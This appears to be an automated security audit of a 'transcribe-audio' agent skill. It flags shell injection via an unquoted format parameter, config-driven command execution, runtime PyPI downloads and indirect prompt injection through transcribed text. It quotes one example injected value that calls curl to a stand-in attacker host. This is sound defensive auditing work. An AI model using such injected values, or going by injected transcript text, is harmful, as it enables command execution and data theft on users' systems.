transcribe-audio
Warn
Audited by Gen Agent Trust Hub on Jun 16, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The script
scripts/transcribe.pyexecutes shell commands usingsubprocess.run(cmd, shell=True). While the script attempts to sanitize inputs usingshlex.quote()for the input path and output directory, theformatvariable is interpolated into the command string without any quoting or validation. This allows an attacker or a malicious configuration to inject arbitrary shell commands through the format parameter (e.g., providing a format liketxt; curl http://attacker.com/$(whoami)). - [REMOTE_CODE_EXECUTION]: The skill's operation model involves reading a shell command template from a local JSON configuration file (
~/.config/transcribe-audio/config.json) and executing it. This design pattern grants the skill the ability to execute arbitrary commands defined in the configuration, which could be exploited if the configuration file is tampered with. - [EXTERNAL_DOWNLOADS]: The setup instructions in
references/setup.mdrecommend usinguvxto run transcription models such asmlx-whisper,parakeet-mlx, andwhisper-ctranslate2. These commands download and execute code from the Python Package Index (PyPI) at runtime. While these are established tools in the machine learning community, the process involves executing code from an external repository. - [PROMPT_INJECTION]: The skill involves processing transcribed text which may contain indirect prompt injections designed to influence the agent during the 'error fixing' or 'structuring' phases. The skill includes some mitigation by instructing the agent to flag issues for human review rather than performing silent corrections, which reduces but does not eliminate the risk.
Audit Metadata